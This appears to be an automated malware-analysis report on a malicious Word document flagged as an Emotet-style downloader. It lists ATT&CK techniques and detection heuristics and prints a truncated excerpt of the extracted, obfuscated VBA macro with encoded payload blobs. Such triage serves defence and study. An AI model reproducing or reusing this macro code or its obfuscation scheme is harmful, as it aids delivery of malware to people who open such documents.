Verdict: MALICIOUS
Risk Score: 224
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1140 Deobfuscate or Obfuscate Malicious Code
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The macro defines an AutoOpen procedure and calls CreateObject, so it is designed to run automatically as soon as the document is opened. The long encoded blobs in the macro source, together with the ClamAV signature 'Doc.Malware.Emodldr-10025032-0', strongly suggest that the macro's purpose is to download and execute a second-stage payload, most likely acting as a downloader or dropper.
Heuristics (8):
- ClamAV: Doc.Malware.Emodldr-10025032-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- CreateObject call [high, OLE_VBA_CREATEOBJ]: CreateObject call
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44190 bytes |

SHA-256: e45165470d60b4574e17b0b6aae1ac991946483960d24d70fb2449f1485bf772

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 26 long base64-like blob(s))
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "CjPvDKPoXlDw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "TwXGufNT"
Function wRnJFiczIE()
On Error Resume Next
Select Case oAzEB
Case 38546
wFjYZH = Hex(29258 - CSng(77965) - 88024 + ChrW(CWAbtC))
mKlaf = WPwkmj
End Select
UbiSV = ukDJfH("ZMAOQAzAGQANQA3ADUAOQAzAGMAYgBhADIAMQA5AGQAOABmADAAMgA0ADgANQA0AGEAMwA4AGIANgAxADcANgAwADkAZgBiADcAMAAxADMAYgAyAGMAZAAwADkAOQBmADQAMABkADkANQA3ADgAYgAzADcAYwAyAGQAOAA5ADYAYQBlAGMAOQBjAGUAz4jZ5%a", 3, 185)
Select Case tDUOoA
Case 12607
MwLbqv = Hex(2362 - CSng(69173) - 31131 + ChrW(uzhRr))
PSQMId = cIJzz
End Select
Select Case sLBsnP
Case 99369
ZdPQrT = Hex(81729 - CSng(98824) - 48973 + ChrW(oSnVd))
iujss = kDnGZz
End Select
dYNjvOldcN = ukDJfH("wDGAZQBiAGIAZQBiADEAYwBlADEAMQBhAGEAYgA1ADQAMAAxADcAMwBhADMANgAyADMAZQBhADIAYgA2AGIAMABkADcAZAA1AGEAZAA5ADMAMQA0ADIANQBhADIAYQA2AGUAMAA4ADMAZgBmADQAOABmAGYAMgA3AGUAMwBkADEAMQA3AGIAMwA5ADMAYgA1ADMAk6P", 4, 193)
Select Case aCYqk
Case 65767
DhKGB = Hex(64746 - CSng(70354) - 66146 + ChrW(LtXhdN))
jHBdsM = kurzwz
End Select
Select Case SvPvC
Case 79669
roimD = Hex(2127 - CSng(37830) - 68028 + ChrW(AvGrW))
icZzm = OqXZKD
End Select
vHGnTzEAIj = ukDJfH("tPl1oKZQAxADkANgAzADcAZgA5ADkAMwBiADMANwBmAGEAZgA5AGMAMABiADgAMgAzAGUAZQBmADMANwBjADEAMQA0ADgAMgBlAGQAZAAxADIAMQBjADEANAA5AGIAOAA2AGUAYgBkADUAZQA3AGUAYQBiADQAvk", 7, 152)
Select Case fMqliZ
Case 55820
FsoJzw = Hex(41599 - CSng(50425) - 45757 + ChrW(zwPMm))
FDkcw = NtztE
End Select
Select Case zDjXhO
Case 32219
RNjTNS = Hex(40574 - CSng(16509) - 14096 + ChrW(kICLt))
wzpdIR = ZKEsfB
End Select
izkNarwztkl = ukDJfH("zwnPADEAMgA5ADkANwBjADQANgA5AGQANQAwADMAYQA2AGIAMwAwADYAYQA4ADYANQAzADcANwBkAGYAYQRPv%j", 5, 78)
Select Case IPbobz
Case 53
bJPiKa = Hex(2305 - CSng(85274) - 51736 + ChrW(JkbkZn))
zfJIIZ = HKQVjO
End Select
Select Case ivFnnO
Case 12551
JQATDv = Hex(79222 - CSng(52145) - 69036 + ChrW(wlHla))
jNUNIl = kdIZiE
End Select
ACpiqnvi = ukDJfH("BF2EAPQA9AHwANwBiADUAOQBhADEAMgBhADUAZAAxAGQAMwBhADUAZQA5AGIAMgBiAGQANgA1AGYAMQA5ADMANAA2ADAAYwAyADEANAAxADYAYwBhADkAMgAzADcAZgA2ADcAMgA4AGQANgA0ADQAMAAyADkAOQA1ADUAv3To", 4, 162)
Select Case PhhNwj
Case 85071
NERFUw = Hex(94428 - CSng(55910) - 84527 + ChrW(UMDaut))
XhPpvW = WpzRE
End Select
Select Case zJnnF
Case 7056
rCGozj = Hex(76075 - CSng(22823) - 87969 + ChrW(IFSFVM))
iRzSu = bwsoY
End Select
ftaVjsVB = ukDJfH("rYNQBiAGMANAA0ADkANAA4ADAAMQAxADEANwBmADQANgA5AGMAYQjW4tSQ", 3, 50)
Select Case ttjQIw
Case 9341
iSCsV = Hex(39136 - CSng(22025) - 62916 + ChrW(BAiwa))
nEMwh = pFrOYz
End Select
Select Case lalWOj
Case 55348
FrwGIO = Hex(76388 - CSng(76973) - 53655 + ChrW(iiUDzA))
UQRVw = QHnzG
End Select
PrLui = ukDJfH("XWRjKSAYgA0AGEAOQBhAGUAMgAxAGMA'|coNvErttO-seCURESTRINg iFZ", 7, 50)
Select Case IPhjtw
Case 2939
wUkRNM = Hex(82219 - CSng(37906) - 25349 + ChrW(hblCt))
KdIYi = VRhGTX
End Select
Select Case tOhiv
Case 7940
hwiRq = Hex(54506 - CSng(50569) - 11948 + ChrW(wKsVu))
jmLTF = Awpaw
End Select
naGvU = ukDJfH("G0oGQBmADkAMQBiAGQAYwA0AGMAMwAyADYAMABlADMAOAA1AGEAMQBlADQAZQAwADgAMAA0ADYANwA0ADAANgA1ADQAMAAzADQAOAA3ADkAYgBmAGYAZAA4ADQAZABhAGMAMwA1ADEAZQA0AGIAOABjAGUAZQBjAGEAYwBjADYUvY", 6, 165)
Select Case SFmHa
Case 94015
iCNrkI = Hex(27962 - CSng(68125) - 86225 + ChrW(OiNPY))
vScwEh = prtEI
End Select
Selec
```

... (truncated)